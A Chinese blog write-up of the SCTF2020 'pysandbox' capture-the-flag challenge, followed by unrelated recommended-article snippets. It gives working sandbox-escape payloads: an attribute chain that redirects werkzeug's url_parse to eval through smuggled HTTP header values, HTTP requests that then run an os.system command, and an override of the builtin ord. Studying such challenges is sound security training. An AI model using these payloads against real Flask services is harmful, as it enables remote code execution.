xiaoyue2019
xiaoyue2019

[SCTF2020] pysandbox

Python沙盒逃逸之过滤小括号和引号

当时做题的时候盯着这张图看了一天:
[SCTF2020] pysandbox_第1张图片
哈哈哈,来康题目。

from flask import Flask, request

app = Flask(__name__)


@app.route('/', methods=["POST","GET"])
def security():
    secret = request.form["cmd"]
    for i in secret:
        if not 42 <= ord(i) <= 122: return "error!"

    exec(secret)
    return "xXXxXXx"


if __name__ == '__main__':
    app.run(host="0.0.0.0")

42-122,也就是*z。关键是过滤了小括号和引号。
过滤小括号就蒙了啊,ssit工具一把梭,提示Python命令盲注,但其实构造出普通的利用链木有用,会报error:
[SCTF2020] pysandbox_第2张图片
难受的一批啊。
这里分享两种绕过的方法

A

官方wp,通过构造出werkzeug.urls.url_parse使其等于eval或者system。
因为过滤了小括号不能直接import,需要找继承链。

import flask
import os
from flask import request
from flask import g
from flask import config

app = flask.Flask(__name__)
app.config['FLAG'] = 'secret'

def search(obj, max_depth):
    visited_clss = []
    visited_objs = []

    def visit(obj, path='obj', depth=0):
        yield path, obj

        if depth == max_depth:
            return

        elif isinstance(obj, (int, float, bool, str, bytes)):
            return

        elif isinstance(obj, type):
            if obj in visited_clss:
                return
            visited_clss.append(obj)
            # print(obj)

        else:
            if obj in visited_objs:
                return
            visited_objs.append(obj)

        # attributes
        for name in dir(obj):
            if name.startswith('__') and name.endswith('__'):
                if name not in ('__globals__', '__class__', '__self__',
                                '__weakref__', '__objclass__', '__module__'):
                    continue
            attr = getattr(obj, name)
            yield from visit(attr, '{}.{}'.format(path, name), depth + 1)

        # dict values
        if hasattr(obj, 'items') and callable(obj.items):
            try:
                for k, v in obj.items():
                    yield from visit(v, '{}[{}]'.format(path, repr(k)), depth)
            except:
                pass

        # items
        elif isinstance(obj, (set, list, tuple, frozenset)):
            for i, v in enumerate(obj):
                yield from visit(v, '{}[{}]'.format(path, repr(i)), depth)

    yield from visit(obj)

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/')
def shrine(shrine):
    with open("1.txt","w") as txt:
        for path, obj in search(request, 15):
            
            txt.write(str(path)+"\n")
            if "werkzeug.urls" in str(path):
            
                print(str(path))
                return "yes"
        # print("----------------------")
        # if str(obj) == app.config['FLAG']:
        #     return path

if __name__ == '__main__':
    app.run(debug=True)

可以mark一下深入学习
https://www.cnblogs.com/Cl0ud/p/12316287.html
找到如下继承链:

request.__class__._get_current_object.__globals__['__loader__'].__class__.__weakref__.__objclass__.contents.__globals__['__loader__'].exec_module.__globals__['_bootstrap_external']._bootstrap.sys.modules['werkzeug.urls']

然后是绕过引号,有两种方法,构造出chr打印引号,还有就是通过外部可控参数如request.host等。所以最后构造出来的请求奇奇怪怪的。

POST / HTTP/1.1
Host: __loader__
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: experimentation_subject_id=IjA3OWUxNDU0LTdiNmItNDhmZS05N2VmLWYyY2UyM2RmZDEyMyI%3D--a3effd8812fc6133bcea4317b16268364ab67abb; lang=zh-CN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-MD5: _bootstrap_external
Content-Encoding: werkzeug.urls
Content-Type: application/x-www-form-urlencoded
Content-Length: 246

cmd=request.__class__._get_current_object.__globals__[request.host].__class__.__weakref__.__objclass__.contents.__globals__[request.host].exec_module.__globals__[request.content_md5]._bootstrap.sys.modules[request.content_encoding].url_parse=eval

POST __import__('os').system('whoami') HTTP/1.1
Host: __loader__
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: experimentation_subject_id=IjA3OWUxNDU0LTdiNmItNDhmZS05N2VmLWYyY2UyM2RmZDEyMyI%3D--a3effd8812fc6133bcea4317b16268364ab67abb; lang=zh-CN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-MD5: _bootstrap_external
Content-Encoding: werkzeug.urls
Content-Type: application/x-www-form-urlencoded
Content-Length: 246

cmd=request.__class__._get_current_object.__globals__[request.host].__class__.__weakref__.__objclass__.contents.__globals__[request.host].exec_module.__globals__[request.content_md5]._bootstrap.sys.modules[request.content_encoding].url_parse=eval

通过第一个poc把ur_parse改成eval,再通过第二个完成rce。
[SCTF2020] pysandbox_第3张图片
[SCTF2020] pysandbox_第4张图片

B

通过更改ord函数使其不管怎样都返回规定的数字。

__builtins__.ord=lambda*args:45

然后直接RCE就行了…
姿势和技术深度同样重要。

你可能感兴趣的:(CTF,安全,经验分享,其他)

  • python绘图实例 charlie_wang007 pythonpython
    pythonPlt实例背景:业务的健身数据,有一个字段是其他附加信息,格式是json,需要查出该字段,解出json,拿到目标数据,按要求聚合,如燃脂是0.25的有几个目的:要验证运营页面的概览数据是否正确策略:从表中查出数据,格式化,用plt绘制,与被测页面的图形数据对比代码如下:#coding:utf8importMySQLdbimportjsonimportpandasaspdimportnu
  • systemtap概述及实例 煊琰
    systemtap对用户级和内核级代码提供了静态和动态跟踪的功能。Systemtap采用其他的内核框架做源:静态探针用tracepoints、动态探针用kprobes、用户级别的探针用uprobes。这些源也为perf、LTTng所用。由于systemtap运行需要内核的调试信息支撑,默认发行版的内核在配置时这些调试开关没有打开,所以安装完systemtap也是无法去探测内核信息的。Systemt
  • k8s(kubernetes)常见故障处理总结——详细文档 运维实战课程 docker和k8s学习文档kubernetesdocker容器
    k8s(kubernetes)常见故障处理总结——详细文档本文涵盖了k8s运维过程中大部分常见的故障,提供相应的排查思路,笔记详细,仅供参考本人会经常更新运维相关技术文档,如有兴趣,可以关注我博客,欢迎互动分享k8s其他相关详细资料下载地址:kubeadm初始化高可用k8s1.20.4集群网盘地址:https://url28.ctfile.com/f/37115828-599516373-25f4
  • java设计模式之工厂模式的使用|普通工厂模式、多个工厂方法模式、静态工厂方法模式、抽象工厂模式的使用|工厂模式的高级使用 小小鱼儿小小林 #设计模式面试这样回答设计模式工厂模式
    目录工厂方法模式(FactoryPattern)前言1.普通工厂模式demo:运行结果:2、多个工厂方法模式demo:运行结果:3、静态工厂方法模式demo:运行结果:4、抽象工厂模式(AbstractFactory)demo:运行结果:高级使用1、通过if...else...来判断demo运行结果:2、通过注解,切面编程demo:运行结果:工厂方法模式(FactoryPattern)前言工厂方法
  • 【Conda】解决 Conda 安装包时遇到的 `Collecting package metadata` 问题 丶2136 #condaconda
    目录引言一、问题展示二、问题分析三、解决步骤1.更新Conda2.创建新环境3.指定包版本4.使用`--no-cache-dir`参数5.更换安装通道6.清理Conda缓存7.查看Conda配置8.使用详细日志模式(VerboseMode)9.使用Pip安装包10.使用Mamba11.其他高级操作四、示例操作流程1.更新Conda2.创建并激活新环境3.使用`conda-forge`通道安装包4.
  • 《Kotlin核心编程》中篇 张云瀚 kotlinkotlin核心编程
    类型系统null的问题及解决方案1.null问题在传统编程语言如Java中,null引用是一个常见的错误根源,容易引发空指针异常(NullPointerException),这类错误往往难以在编译期发现,常在运行时出现,增加了调试成本。2.解决方案可空类型声明:Kotlin通过在类型后加?来表示可空类型,如String?。这使开发者在代码中明确标记可能为null的变量,增强代码的安全性与可读性。例
  • 数字化智能运维平台建设方案 公众号:优享智库 数字化转型数据治理主数据数据仓库运维
    数字化智能运维平台建设方案数字化智能运维平台建设方案项目背景与目标运维现状与挑战数字化转型需求项目目标与预期成果平台架构设计整体架构规划功能模块划分技术选型及原因数据采集与监控数据来源及接入方式实时监控与预警机制数据存储与管理策略智能化分析与优化故障诊断与预测模型性能评估及优化建议资源调度与容量规划平台安全保障措施身份认证与权限管理数据加密传输存储漏洞扫描及修复机制平台实施与运维支持实施步骤及时间
  • AI软件外包需要注意什么 外包开发AI软件的关键因素是什么 如何选择AI外包开发语言 北京动点飞扬软件 AI外包
    1.定义目标与需求首先,要明确你希望AI智能体做什么。是自动化任务、数据分析、自然语言处理,还是其他功能?明确目标可以帮助你选择合适的技术和方法。2.选择开发平台与工具开发AI智能体的软件时,你需要选择适合的编程语言、框架和工具。例如:编程语言:Python是最常用的语言,因为它有强大的AI/ML库,如TensorFlow、PyTorch、scikit-learn等。开发平台:你可以使用本地环境、
  • 分布式光纤应变监测是一种高精度、分布式的监测技术 无锡布里渊 分布式分布式光纤测温温度监测火灾预警厘米级线型感温火灾监测分布式光纤应变
    一、土木工程领域桥梁结构健康监测主跨应变监测:在大跨度桥梁的主跨部分,如悬索桥的主缆、斜拉桥的斜拉索和主梁,分布式光纤应变传感器可以沿着这些关键结构部件进行铺设。通过实时监测应变情况,能够精确捕捉到车辆荷载、风荷载、温度变化等因素引起的结构变形。例如,在强风天气下,桥梁主梁会产生较大的横向和竖向位移,光纤应变传感器可以及时检测到这种变化,评估桥梁结构的安全性。桥墩和基础应变监测:桥墩是支撑桥梁上部
  • linux批量提取文本,关于bash:如何使用sed从字符串中提取多个文本和数字? 国家级做梦冠军 linux批量提取文本
    本问题已经有最佳答案,请猛点这里访问。如何使用"sed"从一行中提取3个或更多单独的文本我有以下几行:echo到目前为止,我可以通过执行以下操作来提取"DOB-029"sed-n's/.*\(DOB-[0-9]*\).*/\1/p'但我没有得到其他文字,例如姓名或职位。我的预期输出应该是MikeDOB-029Post-555已编辑假设我在文件中有一个列表,我想从整个列表中提取特定的文本/ID,然后
  • 网络安全基础{英文答案}_OCR ★Alfalfa★ 网络安全
    Chapter1IntroductionAnswerstoQuestionsTheOSISecurityArchitectureisaframeworkthatprovidesasystematicwayofdefiningtherequirementsforsecurityandcharacterizingtheapproachestosatisfyingthoserequirements.Th
  • vscode通过ssh连接github仓库(git+ssh+github+vscode详细步骤) en你好 vscodesshgithubgit
    vscode如何通过ssh连接github仓库(详细步骤)文章目录vscode如何通过ssh连接github仓库(详细步骤)前言1.ssh2.github一、安装Git二、获取ssh密钥三、在github配置ssh密钥四、在vscode上添加远程仓库总结前言首先我们先来了解一下什么是ssh和github1.sshSSH(SecureShell)是一种网络协议,用于在不安全的网络中安全地传输数据和执
  • Python下3种文字识别工具的源码和效果比较 eybk python开发语言
    1.pytesseractimportpytesseractfromPILimportImageim=Image.open(r'C:/Users/YBK/Pictures/35005.jpg')string=pytesseract.image_to_string(im,lang='chi_sim')print(string)2.paddleocrfrompaddleocrimportPaddleO
  • IT信息化蓝图规划设计与落地方案 公众号:优享智库 数字化转型数据治理主数据数据仓库大数据架构
    IT信息化蓝图规划设计与落地方案第1张大家好!我今天要介绍的主题是:IT信息化蓝图规划设计与落地方案第2张我们今天主要从以下几个方面展开介绍:IT信息化现状分析蓝图规划设计原则与目标基础设施架构优化方案应用系统整合与升级策略数据治理与安全保障措施组织架构调整与人员培训方案实施落地时间表及预算安排总结回顾与未来发展规划第3张下面介绍IT信息化现状分析。第4张在这个领域,首先要看清现有的信息化系统是个
  • 【面试】【程序员基本知识】计算机网络,设计模式,正则,安全 患得患失949 面试考题专栏(前后端)安全面试计算机网络
    一、计算机网络(一)基本概念计算机网络是一种将多台计算机通过硬件和软件互联,以实现资源共享和数据传输的技术。组成部分:(1)硬件:路由器、交换机、网卡、光纤等。(2)软件:协议栈、操作系统、网络应用等。(二)网络分层模型OSI七层模型(1)物理层:负责数据的物理传输。(2)数据链路层:提供节点间的数据传输。(3)网络层:负责路由与寻址(如IP协议)。(4)传输层:提供端到端的通信(如TCP/UDP
  • 设计模式-创建型模式-抽象工厂模式 NorthCastle 设计模式设计模式抽象工厂模式
    抽象工厂模式简介抽象工厂模式:AbstractFactoryPattern是一种创建型模式。核心:“族”的概念,一组具有相同风格或主题的对象,通过同一个工厂接口来创建这个产品族中的对象。感觉:就是对工厂方法模式的一种扩展,由原来的创建一种产品对象,扩展为创建多种产品对象。主要角色抽象产品:对产品的抽象,例如:手机接口、电脑接口具体产品:具体的某个产品,例如:小米手机、华为手机、小米电脑、华为电脑抽
  • 前端开发设计模式——单例模式 夜月还山岚 JavaScript设计模式设计模式单例模式前端javascript
    目录一、单例模式的定义和特点:1.定义:2.特点:二、单例模式的实现方式:1.立即执行函数结合闭包实现:2.ES6类实现:三、单例模式的应用场景1.全局状态管理:2.日志记录器:3.数据库连接:四、单例模式的优点1.减少资源消耗:2.全局访问:3.易于管理:五、单例模式的缺点1.测试困难:2.违法单一职责原则:3.可能导致内存泄漏:六、单例模式的注意事项1.线程安全:2.延迟加载:3.可扩展性:在
  • Python的优缺点 Coke_lovingcloud python开发语言
    优点1.简洁。在实现相同功能时,Python代码的行数往往只有C、C++、Java代码数量的1/5~1/3。2.语法优美。Python语言是高级语言,它接近人类语言,只要掌握由英语单词表示的助记符,大致读懂Python代码;此外Python通过强制缩进体现语句间的逻辑关系,任何人编写Python代码都有规范且具有统一风格,这保证了Python代码的可读性。3.简单易学。相较于其他主流编程语言,Py
  • 信息安全与网络安全有什么区别?(1) 2401_84297944 程序员web安全hibernate安全
    通过在抓包软件下查看通信流量,对计算机网络的认识从抽象变得具象。加解密技术接着,来了解一些网络安全领域内经常打交道的编解码技术和加解密技术。包括base64编码、对称加密、非对称加密、哈希技术等等。了解它们基础的概念、做什么用的,解决什么问题,最后再了解下工作原理。推荐书籍:《加密与解密》白银(结丹期)现在进入第三个阶段——白银时代,激动人心的时刻就要到来了,在这个阶段,我们开始全面学习真正的网络
  • unix&linux大学教程的学习之旅 Freeflicker linuxunix学习
    1、unix&linux第一章、第二章第一章主要是作者讲解unix的发展历史第二章前部分讲解unix发展中的重要历史事件和对unix,linux做出重大推进的人物unix=unix内核+实用工具内核:操作系统核心单内核:一个独立大的程序,能够独立完成所有任务。微内核:规模较小,是一个非常小的程序,只能执行最基本的任务。为了执行其他功能,微内核要调用其他程序,这些程序称为服务器。unix、linux
  • kotlin的密封类 消失的旧时光-1943 kotlin学习kotlin开发语言android
    引言密封类是一种特殊的类,它用来表示受限的类继承结构,即一个类只能有有限的几种子类,而不能有任何其他类型的子类。这不就是JAVA的枚举么。概念密封类使用sealed关键字声明,在Kotlin1.0中,密封类的所有子类必须嵌套在密封类内部;在Kotlin1.1中,这个限制放宽了,允许将子类定义在同一个文件中;在Kotlin1.5中,这个限制进一步放宽了,允许将子类定义在任何地方,只要保证子类可见性不
  • Cline 3.2 重磅更新:免费调用 Claude Sonnet 3.5 和 GPT 4o,开发效率直接拉满! surfirst LLM人工智能AI编程
    1.Cline简介Cline是一款结合了AI助手与VSCode的智能工具,旨在通过其深度集成的能力协助开发者完成复杂的软件开发任务。从创建与编辑文件到执行终端命令,Cline借助Claude3.5Sonnet的代理编程能力,将开发者从繁琐的手动任务中解放出来。同时,它通过ModelContextProtocol(MCP)支持扩展能力,可以为用户创建新的工具,进一步提升开发效率。Cline还注重安全
  • 《动手学深度学习》(PyTorch版) chaser&upper 深度学习pytorch深度学习python
    《动手学深度学习》PyTorch版前言简介面向人群食用方法方法一方法二方法三目录原书地址引用阅读指南前言读书啦!!!本项目将《动手学深度学习》原书中MXNet代码实现改为PyTorch实现。原书作者:阿斯顿·张、李沐、扎卡里C.立顿、亚历山大J.斯莫拉以及其他社区贡献者,GitHub地址:https://github.com/d2l-ai/d2l-zh此书的中英版本存在一些不同,针对此书英文版的P
  • 《深入Python子域名扫描:解锁网络空间的隐藏宝藏》 乐茵安全 python_studypythonphp开发语言
    Python子域名扫描:探索网络世界的隐藏边界在当今数字化的时代,网络安全和网络探索变得愈发重要。网络就像一个广阔无垠的宇宙,隐藏着无数的秘密和潜在的威胁。而子域名扫描,就是在这个庞大的网络宇宙中寻找线索、探索未知领域的一把钥匙。Python,作为一门强大且灵活的编程语言,在网络安全的各个领域都有着广泛的应用。其中,利用Python进行子域名扫描,不仅可以帮助我们发现目标域名下的更多信息,还能在渗
  • 第76期 | GPTSecurity周报 云起无垠 GPTSecurity人工智能网络安全
    GPTSecurity是一个涵盖了前沿学术研究和实践经验分享的社区,集成了生成预训练Transformer(GPT)、人工智能生成内容(AIGC)以及大语言模型(LLM)等安全领域应用的知识。在这里,您可以找到关于GPT/AIGC/LLM最新的研究论文、博客文章、实用的工具和预设指令(Prompts)。现为了更好地知悉近一周的贡献内容,现总结如下。SecurityPapers1.关于使用大语言模型
  • 如何0基础自学网络安全技术,推荐一个非常稳的网络安全学习路线_网络安全入门学习路线 星空真懒 程序员web安全学习安全
    青铜(筑基期)度过了石器时代,你已经储备了一些计算机的基础知识:操作系统的使用,网络协议,前端基础,数据库初识,但这距离做网络安全还不够,在第二个青铜阶段,你还需要再进一步学习基础,在第一阶段之上,难度会开始慢慢上升。这一阶段需要学习的知识有:Web进阶在前面的石器时代,咱们初步接触了网页编程,了解了网页的基本原理。不过那时候是纯前端的,纯静态的网页,没有接触后端。在这个进阶的阶段,你要开始接触W
  • MySQL主从同步复制实现 MostSnails sharding数据库mysql
    MySQL主从同步复制实现一.概念1.数据库一主多从高性能:单点分散到多台机器上。备份:等同于实现Backup。负载均衡:若主挂掉,切换一台Slave机器作为Mater。若Slave挂掉,还有其他Slave支持。二.实现原理1.Mater将变更记录到二进制日志BinaryLog中,Mysql根据事物提交顺序依次记录2.Slave从库两个线程(I/Othread、SQLthread),IO请求主库获
  • Mysql——主从同步 BiQing11 mysql数据库sql
    一、什么是Binlog?Mysql的二进制日志可以是Mysql最重要的日志,记录了所有的DDL和DML语句(除了数据查询语句之外的语句)语句,以事件形式记录,还包含语句所执行的消耗时间,Mysql的二进制日志是事务安全型的。二进制日志包含两类文件:1、二进制日志索引文件(文件后缀为".index")用于记录有所的二进制文件;2、二进制日志文件(文件后缀为“.00000*”)记录了数据库所有的DDL
  • 自学网络安全,一般人我劝你还是算了吧_白银安卓开发 2401_84281629 程序员web安全android安全
    whois信息用来查询域名信息,shodan、zoomeye、fofa等网络空间搜索引擎检索IP、域名、URL等背后的信息,GoogleHacking利用搜索引擎来检索网站内部信息,这些东西都是在网络信息搜集中经常用到的技能。暴力破解在网络攻击中,当扫描到目标开放的服务后,最直接的就是想要登录进去。常见的服务有SSH、RDP、MySQL、Redis、Web表单等等。这个时候,暴力破解通常会派上用场
  • 第84期 | GPTSecurity周报 云起无垠 GPTSecurity人工智能gptAIGC
    GPTSecurity是一个涵盖了前沿学术研究和实践经验分享的社区,集成了生成预训练Transformer(GPT)、人工智能生成内容(AIGC)以及大语言模型(LLM)等安全领域应用的知识。在这里,您可以找到关于GPT/AIGC/LLM最新的研究论文、博客文章、实用的工具和预设指令(Prompts)。现为了更好地知悉近一周的贡献内容,现总结如下。SecurityPapers1.利用数据流路径对大
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他